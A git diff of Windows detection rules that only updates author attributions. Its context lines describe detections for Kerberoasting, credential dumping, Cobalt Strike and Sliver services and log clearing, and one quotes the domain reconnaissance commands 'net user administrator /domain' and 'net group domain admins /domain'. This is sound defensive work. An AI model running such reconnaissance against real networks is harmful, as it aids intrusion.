@@ -5,7 +5,7 @@ description: Detects the use of a scanner by zerosum0x0 that discovers targets v references: - https://twitter.com/AdamTheAnalyst/status/1134394070045003776 - https://github.com/zerosum0x0/CVE-2019-0708 -author: Florian Roth (rule), Adam Bradbury (idea) +author: Florian Roth (Nextron Systems), Adam Bradbury (idea) date: 2019/06/02 modified: 2022/12/25 tags: diff --git a/rules/windows/builtin/security/win_security_samaccountname_spoofing_cve_2021_42287.yml b/rules/windows/builtin/security/win_security_samaccountname_spoofing_cve_2021_42287.yml index 8375702b7..0c6bbc659 100644 --- a/rules/windows/builtin/security/win_security_samaccountname_spoofing_cve_2021_42287.yml +++ b/rules/windows/builtin/security/win_security_samaccountname_spoofing_cve_2021_42287.yml @@ -4,7 +4,7 @@ status: test description: Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287 references: - https://medium.com/@mvelazco/hunting-for-samaccountname-spoofing-cve-2021-42287-and-domain-controller-impersonation-f704513c8a45 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/12/22 modified: 2022/12/25 logsource: diff --git a/rules/windows/builtin/security/win_security_susp_eventlog_cleared.yml b/rules/windows/builtin/security/win_security_susp_eventlog_cleared.yml index 249e1f352..f7cd39645 100644 --- a/rules/windows/builtin/security/win_security_susp_eventlog_cleared.yml +++ b/rules/windows/builtin/security/win_security_susp_eventlog_cleared.yml @@ -8,7 +8,7 @@ description: One of the Windows Eventlogs has been cleared. e.g. caused by "wevt references: - https://twitter.com/deviouspolack/status/832535435960209408 - https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/01/10 modified: 2022/02/24 tags: diff --git a/rules/windows/builtin/security/win_security_susp_failed_logon_reasons.yml b/rules/windows/builtin/security/win_security_susp_failed_logon_reasons.yml index 1c1a2c3fc..19a2088f4 100644 --- a/rules/windows/builtin/security/win_security_susp_failed_logon_reasons.yml +++ b/rules/windows/builtin/security/win_security_susp_failed_logon_reasons.yml @@ -5,7 +5,7 @@ description: This method uses uncommon error codes on failed logons to determine references: - https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625 - https://twitter.com/SBousseaden/status/1101431884540710913 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/02/19 modified: 2022/06/29 tags: diff --git a/rules/windows/builtin/security/win_security_susp_failed_logons_single_source.yml b/rules/windows/builtin/security/win_security_susp_failed_logons_single_source.yml index e7a506127..460b1f4e0 100644 --- a/rules/windows/builtin/security/win_security_susp_failed_logons_single_source.yml +++ b/rules/windows/builtin/security/win_security_susp_failed_logons_single_source.yml @@ -2,7 +2,7 @@ title: Failed Logins with Different Accounts from Single Source System id: e98374a6-e2d9-4076-9b5c-11bdb2569995 status: test description: Detects suspicious failed logins with different user accounts from a single source system -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/01/10 modified: 2022/10/09 tags: diff --git a/rules/windows/builtin/security/win_security_susp_failed_logons_single_source2.yml b/rules/windows/builtin/security/win_security_susp_failed_logons_single_source2.yml index 88f037f25..ddbf4da6c 100644 --- a/rules/windows/builtin/security/win_security_susp_failed_logons_single_source2.yml +++ b/rules/windows/builtin/security/win_security_susp_failed_logons_single_source2.yml @@ -5,7 +5,7 @@ related: type: derived status: test description: Detects suspicious failed logins with different user accounts from a single source system -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/01/10 modified: 2022/11/26 tags: diff --git a/rules/windows/builtin/security/win_security_susp_kerberos_manipulation.yml b/rules/windows/builtin/security/win_security_susp_kerberos_manipulation.yml index b44d161f1..0164af360 100644 --- a/rules/windows/builtin/security/win_security_susp_kerberos_manipulation.yml +++ b/rules/windows/builtin/security/win_security_susp_kerberos_manipulation.yml @@ -2,7 +2,7 @@ title: Kerberos Manipulation id: f7644214-0eb0-4ace-9455-331ec4c09253 status: test description: This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/02/10 modified: 2021/11/27 tags: diff --git a/rules/windows/builtin/security/win_security_susp_logon_newcredentials.yml b/rules/windows/builtin/security/win_security_susp_logon_newcredentials.yml index 293620525..b09d42450 100644 --- a/rules/windows/builtin/security/win_security_susp_logon_newcredentials.yml +++ b/rules/windows/builtin/security/win_security_susp_logon_newcredentials.yml @@ -4,7 +4,7 @@ status: experimental description: Detects logon events that specify new credentials references: - https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf -author: Max Altgelt +author: Max Altgelt (Nextron Systems) date: 2022/04/06 logsource: product: windows diff --git a/rules/windows/builtin/security/win_security_susp_net_recon_activity.yml b/rules/windows/builtin/security/win_security_susp_net_recon_activity.yml index 85e8f6951..76d15c0f7 100644 --- a/rules/windows/builtin/security/win_security_susp_net_recon_activity.yml +++ b/rules/windows/builtin/security/win_security_susp_net_recon_activity.yml @@ -4,7 +4,7 @@ status: test description: Detects activity as "net user administrator /domain" and "net group domain admins /domain" references: - https://findingbad.blogspot.de/2017/01/hunting-what-does-it-look-like.html -author: Florian Roth (rule), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community +author: Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community date: 2017/03/07 modified: 2022/08/22 tags: diff --git a/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip.yml b/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip.yml index de2b5d595..62049c326 100644 --- a/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip.yml +++ b/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened. references: - https://twitter.com/sbousseaden/status/1523383197513379841 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/05/09 logsource: product: windows diff --git a/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml b/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml index fd954acb5..6c494561c 100644 --- a/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml +++ b/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened. references: - https://twitter.com/sbousseaden/status/1523383197513379841 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/05/09 logsource: product: windows diff --git a/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml b/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml index 46ebae3f5..ca222a38f 100644 --- a/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml +++ b/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened. references: - https://twitter.com/sbousseaden/status/1523383197513379841 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/05/09 logsource: product: windows diff --git a/rules/windows/builtin/security/win_security_susp_possible_shadow_credentials_added.yml b/rules/windows/builtin/security/win_security_susp_possible_shadow_credentials_added.yml index 13465e7a2..c8f83d5f4 100644 --- a/rules/windows/builtin/security/win_security_susp_possible_shadow_credentials_added.yml +++ b/rules/windows/builtin/security/win_security_susp_possible_shadow_credentials_added.yml @@ -6,7 +6,7 @@ references: - https://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html - https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/ - https://twitter.com/SBousseaden/status/1581300963650187264? -author: Nasreddine Bencherchali (rule), Elastic (idea) +author: Nasreddine Bencherchali (Nextron Systems), Elastic (idea) date: 2022/10/17 tags: - attack.credential_access diff --git a/rules/windows/builtin/security/win_security_susp_rc4_kerberos.yml b/rules/windows/builtin/security/win_security_susp_rc4_kerberos.yml index 263076832..859642906 100644 --- a/rules/windows/builtin/security/win_security_susp_rc4_kerberos.yml +++ b/rules/windows/builtin/security/win_security_susp_rc4_kerberos.yml @@ -5,7 +5,7 @@ description: Detects service ticket requests using RC4 encryption type references: - https://adsecurity.org/?p=3458 - https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/02/06 modified: 2022/06/19 tags: diff --git a/rules/windows/builtin/security/win_security_susp_scheduled_task_creation.yml b/rules/windows/builtin/security/win_security_susp_scheduled_task_creation.yml index 4da7fb242..3ea3e2913 100644 --- a/rules/windows/builtin/security/win_security_susp_scheduled_task_creation.yml +++ b/rules/windows/builtin/security/win_security_susp_scheduled_task_creation.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc. references: - https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/05 modified: 2022/12/07 tags: diff --git a/rules/windows/builtin/security/win_security_susp_scheduled_task_delete.yml b/rules/windows/builtin/security/win_security_susp_scheduled_task_delete.yml index b8f9859ca..3b99f9f4f 100644 --- a/rules/windows/builtin/security/win_security_susp_scheduled_task_delete.yml +++ b/rules/windows/builtin/security/win_security_susp_scheduled_task_delete.yml @@ -12,7 +12,7 @@ description: Detects when adversaries stop services or processes by deleting or references: - https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699 - https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/05 modified: 2022/12/09 tags: diff --git a/rules/windows/builtin/security/win_security_susp_scheduled_task_update.yml b/rules/windows/builtin/security/win_security_susp_scheduled_task_update.yml index 6c487bf1b..157385fdd 100644 --- a/rules/windows/builtin/security/win_security_susp_scheduled_task_update.yml +++ b/rules/windows/builtin/security/win_security_susp_scheduled_task_update.yml @@ -4,7 +4,7 @@ status: experimental description: Detects update to a scheduled task event that contain suspicious keywords. references: - https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/05 tags: - attack.execution diff --git a/rules/windows/builtin/security/win_security_user_added_to_local_administrators.yml b/rules/windows/builtin/security/win_security_user_added_to_local_administrators.yml index e6a91556e..12c588b5e 100644 --- a/rules/windows/builtin/security/win_security_user_added_to_local_administrators.yml +++ b/rules/windows/builtin/security/win_security_user_added_to_local_administrators.yml @@ -2,7 +2,7 @@ title: User Added to Local Administrators id: c265cf08-3f99-46c1-8d59-328247057d57 status: stable description: This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/03/14 modified: 2021/01/17 tags: diff --git a/rules/windows/builtin/security/win_security_wmi_persistence.yml b/rules/windows/builtin/security/win_security_wmi_persistence.yml index 2851c8613..6b22aa511 100644 --- a/rules/windows/builtin/security/win_security_wmi_persistence.yml +++ b/rules/windows/builtin/security/win_security_wmi_persistence.yml @@ -8,7 +8,7 @@ description: Detects suspicious WMI event filter and command line event consumer references: - https://twitter.com/mattifestation/status/899646620148539397 - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/ -author: Florian Roth, Gleb Sukhodolskiy, Timur Zinniatullin oscd.community +author: Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community date: 2017/08/22 modified: 2022/11/29 tags: diff --git a/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml b/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml index 5e2c4ddce..2f74d8d06 100644 --- a/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml +++ b/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml @@ -4,7 +4,7 @@ status: experimental description: Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations references: - https://github.com/nasbench/EVTX-ETW-Resources/blob/45fd5be71a51aa518b1b36d4e1f36af498084e27/ETWEventsList/CSV/Windows11/21H2/W11_21H2_Pro_20220719_22000.795/Providers/Microsoft-Windows-Security-Mitigations.csv -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/03 modified: 2022/09/28 tags: diff --git a/rules/windows/builtin/shell_core/win_shell_core_susp_packages_installed.yml b/rules/windows/builtin/shell_core/win_shell_core_susp_packages_installed.yml index 6bcec6e14..309586706 100644 --- a/rules/windows/builtin/shell_core/win_shell_core_susp_packages_installed.yml +++ b/rules/windows/builtin/shell_core/win_shell_core_susp_packages_installed.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspicious application installed by looking at the added shortcut to the app resolver cache references: - https://nasbench.medium.com/finding-forensic-goodness-in-obscure-windows-event-logs-60e978ea45a3 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/14 tags: - attack.execution diff --git a/rules/windows/builtin/smbclient/win_susp_failed_guest_logon.yml b/rules/windows/builtin/smbclient/win_susp_failed_guest_logon.yml index f8ff9adc9..7405115fe 100644 --- a/rules/windows/builtin/smbclient/win_susp_failed_guest_logon.yml +++ b/rules/windows/builtin/smbclient/win_susp_failed_guest_logon.yml @@ -6,7 +6,7 @@ references: - https://twitter.com/KevTheHermit/status/1410203844064301056 - https://github.com/hhlxf/PrintNightmare - https://github.com/afwu/PrintNightmare -author: Florian Roth, KevTheHermit, fuzzyf10w +author: Florian Roth (Nextron Systems), KevTheHermit, fuzzyf10w date: 2021/06/30 modified: 2023/01/02 tags: diff --git a/rules/windows/builtin/system/win_system_apt_carbonpaper_turla.yml b/rules/windows/builtin/system/win_system_apt_carbonpaper_turla.yml index 20c565b96..ca081753a 100755 --- a/rules/windows/builtin/system/win_system_apt_carbonpaper_turla.yml +++ b/rules/windows/builtin/system/win_system_apt_carbonpaper_turla.yml @@ -4,7 +4,7 @@ status: test description: This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET references: - https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/03/31 modified: 2021/11/30 tags: diff --git a/rules/windows/builtin/system/win_system_apt_chafer_mar18_system.yml b/rules/windows/builtin/system/win_system_apt_chafer_mar18_system.yml index cfc406ed3..d20c11f0e 100644 --- a/rules/windows/builtin/system/win_system_apt_chafer_mar18_system.yml +++ b/rules/windows/builtin/system/win_system_apt_chafer_mar18_system.yml @@ -4,7 +4,7 @@ status: experimental description: Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018 references: - https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/ -author: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community +author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community date: 2018/03/23 modified: 2022/11/27 tags: diff --git a/rules/windows/builtin/system/win_system_apt_stonedrill.yml b/rules/windows/builtin/system/win_system_apt_stonedrill.yml index 248b67604..32d23378b 100755 --- a/rules/windows/builtin/system/win_system_apt_stonedrill.yml +++ b/rules/windows/builtin/system/win_system_apt_stonedrill.yml @@ -4,7 +4,7 @@ status: test description: This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky references: - https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/03/07 modified: 2021/11/30 tags: diff --git a/rules/windows/builtin/system/win_system_apt_turla_service_png.yml b/rules/windows/builtin/system/win_system_apt_turla_service_png.yml index 255a88fd9..4cce1cdd7 100644 --- a/rules/windows/builtin/system/win_system_apt_turla_service_png.yml +++ b/rules/windows/builtin/system/win_system_apt_turla_service_png.yml @@ -4,7 +4,7 @@ status: test description: This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018 references: - https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2018/11/23 modified: 2021/11/30 tags: diff --git a/rules/windows/builtin/system/win_system_cobaltstrike_service_installs.yml b/rules/windows/builtin/system/win_system_cobaltstrike_service_installs.yml index 7c2dcf12c..6caf33107 100644 --- a/rules/windows/builtin/system/win_system_cobaltstrike_service_installs.yml +++ b/rules/windows/builtin/system/win_system_cobaltstrike_service_installs.yml @@ -6,7 +6,7 @@ references: - https://www.sans.org/webcasts/119395 - https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/ - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ -author: Florian Roth, Wojciech Lesicki +author: Florian Roth (Nextron Systems), Wojciech Lesicki date: 2021/05/26 modified: 2022/11/27 tags: diff --git a/rules/windows/builtin/system/win_system_eventlog_cleared.yml b/rules/windows/builtin/system/win_system_eventlog_cleared.yml index 8aadb63f4..a1b492229 100644 --- a/rules/windows/builtin/system/win_system_eventlog_cleared.yml +++ b/rules/windows/builtin/system/win_system_eventlog_cleared.yml @@ -12,7 +12,7 @@ description: One of the Windows Eventlogs has been cleared. e.g. caused by "wevt references: - https://twitter.com/deviouspolack/status/832535435960209408 - https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/01/10 modified: 2023/01/18 tags: diff --git a/rules/windows/builtin/system/win_system_kdcsvc_rc4_downgrade.yml b/rules/windows/builtin/system/win_system_kdcsvc_rc4_downgrade.yml index f85fed634..12739f73d 100644 --- a/rules/windows/builtin/system/win_system_kdcsvc_rc4_downgrade.yml +++ b/rules/windows/builtin/system/win_system_kdcsvc_rc4_downgrade.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation references: - https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/11/09 tags: - attack.privilege_escalation diff --git a/rules/windows/builtin/system/win_system_lpe_indicators_tabtip.yml b/rules/windows/builtin/system/win_system_lpe_indicators_tabtip.yml index 3ad2ff0ad..0d1c6c7c8 100644 --- a/rules/windows/builtin/system/win_system_lpe_indicators_tabtip.yml +++ b/rules/windows/builtin/system/win_system_lpe_indicators_tabtip.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode references: - https://github.com/antonioCoco/JuicyPotatoNG -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/10/07 modified: 2022/12/04 tags: diff --git a/rules/windows/builtin/system/win_system_mal_creddumper.yml b/rules/windows/builtin/system/win_system_mal_creddumper.yml index 6c946fc93..f30c790c3 100644 --- a/rules/windows/builtin/system/win_system_mal_creddumper.yml +++ b/rules/windows/builtin/system/win_system_mal_creddumper.yml @@ -4,7 +4,7 @@ status: experimental description: Detects well-known credential dumping tools execution via service execution events references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment -author: Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community +author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community date: 2017/03/05 modified: 2022/11/29 tags: diff --git a/rules/windows/builtin/system/win_system_ntfs_vuln_exploit.yml b/rules/windows/builtin/system/win_system_ntfs_vuln_exploit.yml index 3c93afdd6..de52eb1c4 100644 --- a/rules/windows/builtin/system/win_system_ntfs_vuln_exploit.yml +++ b/rules/windows/builtin/system/win_system_ntfs_vuln_exploit.yml @@ -6,7 +6,7 @@ references: - https://twitter.com/jonasLyk/status/1347900440000811010 - https://twitter.com/wdormann/status/1347958161609809921 - https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/01/11 modified: 2022/12/25 tags: diff --git a/rules/windows/builtin/system/win_system_quarkspwdump_clearing_hive_access_history.yml b/rules/windows/builtin/system/win_system_quarkspwdump_clearing_hive_access_history.yml index b2cc5aace..2f6594cdc 100644 --- a/rules/windows/builtin/system/win_system_quarkspwdump_clearing_hive_access_history.yml +++ b/rules/windows/builtin/system/win_system_quarkspwdump_clearing_hive_access_history.yml @@ -2,7 +2,7 @@ title: QuarksPwDump Clearing Access History id: 39f919f3-980b-4e6f-a975-8af7e507ef2b status: test description: Detects QuarksPwDump clearing access history in hive -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/05/15 modified: 2022/04/14 tags: diff --git a/rules/windows/builtin/system/win_system_rare_service_installs.yml b/rules/windows/builtin/system/win_system_rare_service_installs.yml index 07176047a..de32f9275 100644 --- a/rules/windows/builtin/system/win_system_rare_service_installs.yml +++ b/rules/windows/builtin/system/win_system_rare_service_installs.yml @@ -2,7 +2,7 @@ title: Rare Service Installations id: 66bfef30-22a5-4fcd-ad44-8d81e60922ae status: test description: Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/03/08 modified: 2022/03/21 tags: diff --git a/rules/windows/builtin/system/win_system_service_install_anydesk.yml b/rules/windows/builtin/system/win_system_service_install_anydesk.yml index a76bf431b..5277b7f19 100644 --- a/rules/windows/builtin/system/win_system_service_install_anydesk.yml +++ b/rules/windows/builtin/system/win_system_service_install_anydesk.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the installation of the anydesk software service. Which could be an indication of anydesk abuse if you the software isn't already used. references: - https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/11 tags: - attack.persistence diff --git a/rules/windows/builtin/system/win_system_service_install_hacktools.yml b/rules/windows/builtin/system/win_system_service_install_hacktools.yml index 6f0f4e94b..4e9779c3d 100644 --- a/rules/windows/builtin/system/win_system_service_install_hacktools.yml +++ b/rules/windows/builtin/system/win_system_service_install_hacktools.yml @@ -4,7 +4,7 @@ status: test description: Detects PsExec service installation and execution events (service and Sysmon) references: - Internal Research -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/03/21 tags: - attack.execution diff --git a/rules/windows/builtin/system/win_system_service_install_mesh_agent.yml b/rules/windows/builtin/system/win_system_service_install_mesh_agent.yml index 2d51a1dad..d1b487cef 100644 --- a/rules/windows/builtin/system/win_system_service_install_mesh_agent.yml +++ b/rules/windows/builtin/system/win_system_service_install_mesh_agent.yml @@ -4,7 +4,7 @@ status: experimental description: Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers references: - https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/11/28 tags: - attack.command_and_control diff --git a/rules/windows/builtin/system/win_system_service_install_netsupport_manager.yml b/rules/windows/builtin/system/win_system_service_install_netsupport_manager.yml index 7687f648d..47e9046ac 100644 --- a/rules/windows/builtin/system/win_system_service_install_netsupport_manager.yml +++ b/rules/windows/builtin/system/win_system_service_install_netsupport_manager.yml @@ -4,7 +4,7 @@ status: experimental description: Detects NetSupport Manager service installation on the target system. references: - http://resources.netsupportsoftware.com/resources/manualpdfs/nsm_manual_uk.pdf -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/10/31 tags: - attack.persistence diff --git a/rules/windows/builtin/system/win_system_service_install_paexec.yml b/rules/windows/builtin/system/win_system_service_install_paexec.yml index 6f779a865..0c9a73ba5 100644 --- a/rules/windows/builtin/system/win_system_service_install_paexec.yml +++ b/rules/windows/builtin/system/win_system_service_install_paexec.yml @@ -4,7 +4,7 @@ status: experimental description: Detects PAExec service installation references: - https://www.poweradmin.com/paexec/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/10/26 tags: - attack.execution diff --git a/rules/windows/builtin/system/win_system_service_install_pdqdeploy.yml b/rules/windows/builtin/system/win_system_service_install_pdqdeploy.yml index 4956ebdb7..288ba91a6 100644 --- a/rules/windows/builtin/system/win_system_service_install_pdqdeploy.yml +++ b/rules/windows/builtin/system/win_system_service_install_pdqdeploy.yml @@ -6,7 +6,7 @@ description: | PDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines references: - https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/22 tags: - attack.privilege_escalation diff --git a/rules/windows/builtin/system/win_system_service_install_pdqdeploy_runner.yml b/rules/windows/builtin/system/win_system_service_install_pdqdeploy_runner.yml index 89a1c1d23..18edd9bff 100644 --- a/rules/windows/builtin/system/win_system_service_install_pdqdeploy_runner.yml +++ b/rules/windows/builtin/system/win_system_service_install_pdqdeploy_runner.yml @@ -6,7 +6,7 @@ description: | When a package is deployed via PDQDeploy it installs a remote service on the target machine with the name "PDQDeployRunner-X" where "X" is an integer starting from 1 references: - https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/22 tags: - attack.privilege_escalation diff --git a/rules/windows/builtin/system/win_system_service_install_remote_utilities.yml b/rules/windows/builtin/system/win_system_service_install_remote_utilities.yml index d380957e8..2bc6ee185 100644 --- a/rules/windows/builtin/system/win_system_service_install_remote_utilities.yml +++ b/rules/windows/builtin/system/win_system_service_install_remote_utilities.yml @@ -4,7 +4,7 @@ status: experimental description: Detects Remote Utilities Host service installation on the target system. references: - https://www.remoteutilities.com/support/kb/host-service-won-t-start/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/10/31 tags: - attack.persistence diff --git a/rules/windows/builtin/system/win_system_service_install_sliver.yml b/rules/windows/builtin/system/win_system_service_install_sliver.yml index d20c81137..c4c54a6f3 100644 --- a/rules/windows/builtin/system/win_system_service_install_sliver.yml +++ b/rules/windows/builtin/system/win_system_service_install_sliver.yml @@ -5,7 +5,7 @@ description: Detects known malicious service installation that appear in cases i references: - https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/client/command/commands.go#L1231 - https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/ -author: Florian Roth, Nasreddine Bencherchali +author: Florian Roth (Nextron Systems), Nasreddine Bencherchali date: 2022/08/25 tags: - attack.execution diff --git a/rules/windows/builtin/system/win_system_service_install_susp_double_ampersand.yml b/rules/windows/builtin/system/win_system_service_install_susp_double_ampersand.yml index 415e92d20..186b04455 100644 --- a/rules/windows/builtin/system/win_system_service_install_susp_double_ampersand.yml +++ b/rules/windows/builtin/system/win_system_service_install_susp_double_ampersand.yml @@ -4,7 +4,7 @@ status: experimental description: Detects a service installation that uses a suspicious double ampersand used in the image path value references: - Internal Research -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/07/05 tags: - attack.defense_evasion diff --git a/rules/windows/builtin/system/win_system_service_install_tacticalrmm.yml b/rules/windows/builtin/system/win_system_service_install_tacticalrmm.yml index ea4a33722..ba939b237 100644 --- a/rules/windows/builtin/system/win_system_service_install_tacticalrmm.yml +++ b/rules/windows/builtin/system/win_system_service_install_tacticalrmm.yml @@ -4,7 +4,7 @@ status: experimental description: Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool. references: - https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/11/28 tags: - attack.command_and_control diff --git a/rules/windows/builtin/system/win_system_susp_eventlog_cleared.yml b/rules/windows/builtin/system/win_system_susp_eventlog_cleared.yml index 03564d4f5..5039dfcb3 100644 --- a/rules/windows/builtin/system/win_system_susp_eventlog_cleared.yml +++ b/rules/windows/builtin/system/win_system_susp_eventlog_cleared.yml @@ -8,7 +8,7 @@ description: Detects the clearing of one of the Windows Core Eventlogs. e.g. cau references: - https://twitter.com/deviouspolack/status/832535435960209408 - https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100 -author: Florian Roth, Tim Shelton +author: Florian Roth (Nextron Systems), Tim Shelton date: 2022/05/17 modified: 2023/01/18 tags: diff --git a/rules/windows/builtin/system/win_system_susp_proceshacker.yml b/rules/windows/builtin/system/win_system_susp_proceshacker.yml index 4b9d987c6..9abe07d80 100644 --- a/rules/windows/builtin/system/win_system_susp_proceshacker.yml +++ b/rules/windows/builtin/system/win_system_susp_proceshacker.yml @@ -4,7 +4,7 @@ status: test description: Detects a ProcessHacker tool that elevated privileges to a very high level references: - https://twitter.com/1kwpeter/status/1397816101455765504 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/05/27 modified: 2022/12/25 tags: diff --git 